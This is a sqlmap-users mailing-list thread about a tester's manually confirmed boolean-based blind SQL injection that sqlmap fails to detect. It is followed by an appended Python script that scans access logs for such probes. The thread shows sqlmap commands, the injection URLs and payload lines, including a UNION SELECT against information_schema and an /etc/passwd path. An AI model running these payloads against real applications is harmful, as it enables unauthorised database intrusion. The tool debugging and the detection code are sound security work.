Curious, have you tried using the --prefix and --suffix options to frame
your injection to see if that helps?

On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amcljohn...@gmail.com>
wrote:

> OK. You're right in that the following lines in your dummy output
> should produce discernible responses when tested against the
> application:
> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>
> I've verified this manually. Thanks and I'll send you the traffic output
> file.
>
> Cheers,
>
> Alistair.
>
> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
> <miroslav.stam...@gmail.com> wrote:
> > I would say that you screwed something up. Can you please send that
> > traffic file I requested?
> >
> > Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> > invalid.
> >
> > $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
> > --dummy -v 3
> >          _
> >  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> > |_ -| . | |     | .'| . |
> > |___|_  |_|_|_|_|__,|  _|
> >       |_|           |_|   http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> > mutual consent is illegal. It is the end user's responsibility to obey all
> > applicable local, state and federal laws. Developers assume no liability and
> > are not responsible for any misuse or damage caused by this program
> >
> > [*] starting at 08:55:05
> >
> > [08:55:05] [DEBUG] cleaning up configuration parameters
> > [08:55:05] [DEBUG] setting the HTTP timeout
> > [08:55:05] [DEBUG] creating HTTP requests opener object
> > [08:55:05] [DEBUG] heuristically checking if the target is protected by some
> > kind of WAF/IPS/IDS
> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> > comparison on a sequence matcher. If no dynamic nor injectable parameters
> > are detected, or in case of junk results, refer to user's manual paragraph
> > 'Page comparison' and provide a string or regular expression to match on
> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> > retry the request
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 2485
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 8682
> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
> > might not be injectable
> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> > ...
> >
> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com>
> > wrote:
> >>
> >> Hi Brandon,
> >>
> >> Thanks for your comment. Confirming that I've tried risk=3 with
> >> level=5 with the same results. I've looked more closely at the
> >> requests that sqlmap is sending to check if the parameter is
> >> injectable. It is testing the Sec parameter with values such as:
> >>
> >> PackageSelection) AND 1477=7114
> >> PackageSelection) AND 1631=1631
> >> PackageSelection') AND 5603=7729
> >> PackageSelection') AND 1631=1631
> >> PackageSelection' AND 3943=9381
> >> PackageSelection' AND 1631=1631
> >> PackageSelection" AND 3324=4690
> >> PackageSelection" AND 1631=1631
> >> PackageSelection) AND 4734=6616 AND (6346=6346
> >> PackageSelection)) AND 7350=9272 AND (8861=8861
> >>
> >> When in fact, I assume it would need to use logic like I used to get
> >> distinguishable responses:
> >>
> >> PackageSelection (returns response A)
> >> PackageSelection' AND '1'='1 (returns response A)
> >> PackageSelection' AND '1'='2 (returns response B)
> >>
> >> In a nutshell, it doesn't appear to be trying single quotes and values
> >> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
> >> typical format for checking boolean-based blind SQLi.
> >>
> >> Cheers,
> >>
> >> Alistair.
> >>
> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> >> <bperry.volat...@gmail.com> wrote:
> >> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >> >
> >> > Alistair, have you tried --risk=3 with --level=5 yet?
> >> >
> >> > Sent from a phone
> >> >
> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
> >> > <miroslav.stam...@gmail.com>
> >> > wrote:
> >> >
> >> > Can you please send the unredacted content of request.txt to my address?
> >> >
> >> > If not, then please at least send me the content of traffic file which
> >> > you can obtain by just appending the "-t traffic.txt" to the regular
> >> > sqlmap's run.
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amcljohn...@gmail.com>
> >> > wrote:
> >> >>
> >> >> Thanks for the quick reply.
> >> >>
> >> >> The contents of the request file are as follows:
> >> >>
> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> >> Host: <redacted>
> >> >> Accept: */*
> >> >> Accept-Language: en
> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
> >> >> Connection: close
> >> >> Referer: <redacted>
> >> >> Cookie: <redacted>
> >> >>
> >> >> I've redacted some of the details as it's not appropriate to draw
> >> >> attention to an internet facing application's SQLi vulnerability.
> >> >>
> >> >> When providing the request file as part of the following command:
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> >> exploit) the boolean-based blind vulnerability which I've verified
> >> >> manually.
> >> >>
> >> >> Thanks again,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> >> <miroslav.stam...@gmail.com> wrote:
> >> >> > And what is the content of request file?
> >> >> >
> >> >> > Bye
> >> >> >
> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amcljohn...@gmail.com>
> >> >> > wrote:
> >> >> >>
> >> >> >> Hi sqlmappers,
> >> >> >>
> >> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> >> the past. I came across what appeared to be pretty typical boolean-based
> >> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> >> vulnerable and to exploit it further. And as we know, manually exploiting
> >> >> >> blind SQLi is cumbersome to say the least.
> >> >> >>
> >> >> >> Here is a summary of the requests I've made to manually confirm the
> >> >> >> vulnerability.
> >> >> >>
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
> >> >> >>
> >> >> >> I've tried various sqlmap flags and thought the following command
> >> >> >> would give me the best chance of success:
> >> >> >>
> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> >> 'industries' -v 1
> >> >> >>
> >> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> >> not response B.
> >> >> >>
> >> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> >> this with the AND statement as it should but is not using single
> >> >> >> quotes as per my example above.
> >> >> >>
> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
> >> >> >> more than happy to contribute some time to improve it so it can
> >> >> >> identify injectable parameters such as these in the future.
> >> >> >>
> >> >> >> Thanks,
> >> >> >>
> >> >> >> Al.
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> ------------------------------------------------------------------------------
> >> >> >> One dashboard for servers and applications across
> >> >> >> Physical-Virtual-Cloud
> >> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> >> Insights
> >> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> >> _______________________________________________
> >> >> >> sqlmap-users mailing list
> >> >> >> sqlmap-users@lists.sourceforge.net
> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >> >
> >> >> >
> >> >> >
> >> >> >
> >> >> > --
> >> >> > Miroslav Stampar
> >> >> > http://about.me/stamparm
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >> >
> >> >
> >> >
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
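A defender-side counterpart to the probing discussed in this thread, added here as an example; it is not code from the thread and not part of sqlmap. It scans access-log lines for the boolean comparison shapes quoted above (`AND 1559=1559`, `AND 1595=1103`, `' AND '1'='1`, `'cBLQ'='cBLQ`, and the `-- pZYt` comment tail), groups them by client, path and parameter, and records whether the "true" and "false" branches came back with different response sizes, which is the same behavioural difference that `--string 'industries'` tells sqlmap to key on. The combined log format, the sample lines, and every function and pattern name are assumptions made for the example.

```python
"""Flag boolean-based blind SQLi probing in web server access logs.

Added example, not code from the mailing-list thread or from sqlmap.
Assumes combined-format access log lines with URL-encoded query strings;
the SAMPLE_LOG lines are constructed, modelled on the payload shapes in
the sqlmap -v 3 output quoted in the thread. All names are hypothetical.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines: a baseline request, the manual '1'='1 / '1'='2 pair
# from the thread, two sqlmap-style probes, and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:21:59:01 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Apr/2015:21:59:02 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27+AND+%271%27%3D%271 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Apr/2015:21:59:03 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27+AND+%271%27%3D%272 HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Apr/2015:21:59:04 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27+AND+1595%3D1103+AND+%27cBLQ%27%3D%27cBLQ HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Apr/2015:21:59:05 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection+AND+8168%3D8736--+pZYt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [28/Apr/2015:22:00:01 +0000] "GET /help/UserGuide.aspx?Sec=Introduction HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Comparison shapes seen in the thread: `AND 1559=1559`, `AND 1595=1103`,
# `AND '1'='1`, `AND 'cBLQ'='cBLQ` (the final closing quote is supplied by the app).
BOOL_PROBE_RE = re.compile(
    r"""
    \b(?:and|or)\s+
    (?:
        (?P<nl>\d+)\s*=\s*(?P<nr>\d+)
      | ['"](?P<sl>[^'"]*)['"]\s*=\s*['"](?P<sr>[^'"]*)
    )
    """,
    re.IGNORECASE | re.VERBOSE,
)
# Trailing SQL comment used to swallow the rest of the query (`-- pZYt` above).
COMMENT_TAIL_RE = re.compile(r"--\s*\w*\s*$")


def parse_line(line):
    """Split one access-log line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl splits each pair on its first '=' before percent-decoding,
    # so an encoded %3D inside a value survives as part of that value.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    rec["bytes"] = int(rec["bytes"]) if rec["bytes"].isdigit() else None
    return rec


def classify_value(value):
    """Return 'true' / 'false' if the value carries a boolean probe, else None."""
    m = BOOL_PROBE_RE.search(value)
    if not m:
        return None
    if m.group("nl") is not None:
        return "true" if int(m.group("nl")) == int(m.group("nr")) else "false"
    return "true" if m.group("sl") == m.group("sr") else "false"


def scan_log(text):
    """Per (client, path, parameter): probe counts, response sizes per branch, flags."""
    stats = defaultdict(lambda: {"true": 0, "false": 0, "comment_tail": 0,
                                 "sizes": {"true": set(), "false": set()}})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            branch = classify_value(value)
            if branch is None:
                continue
            s = stats[(rec["ip"], rec["path"], name)]
            s[branch] += 1
            if rec["bytes"] is not None:
                s["sizes"][branch].add(rec["bytes"])
            if COMMENT_TAIL_RE.search(value):
                s["comment_tail"] += 1
    report = {}
    for key, s in stats.items():
        # Both branches from one client against one parameter is the blind-probing
        # signature; differing sizes mean the application answered the two differently.
        s["probing"] = s["true"] > 0 and s["false"] > 0
        s["responses_diverge"] = bool(s["sizes"]["true"] and s["sizes"]["false"]
                                      and s["sizes"]["true"] != s["sizes"]["false"])
        report[key] = s
    return report


if __name__ == "__main__":
    for (ip, path, param), s in scan_log(SAMPLE_LOG).items():
        print(f"{ip} {path} param={param}: true={s['true']} false={s['false']} "
              f"comment_tail={s['comment_tail']} probing={s['probing']} "
              f"diverge={s['responses_diverge']}")
```

Run it directly to print one summary line per (client, path, parameter). On the constructed sample it reports one true-branch and three false-branch probes against `Sec` from 10.0.0.5, one comment-terminated payload, and divergent response sizes between the branches, which on a real log is the cue to look at the application's handling of that parameter rather than only at the client. The comparison regex is a signal, not proof: a legitimate value containing `and 1=1` would also match, so treat the per-parameter pairing and the size divergence as the stronger evidence.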
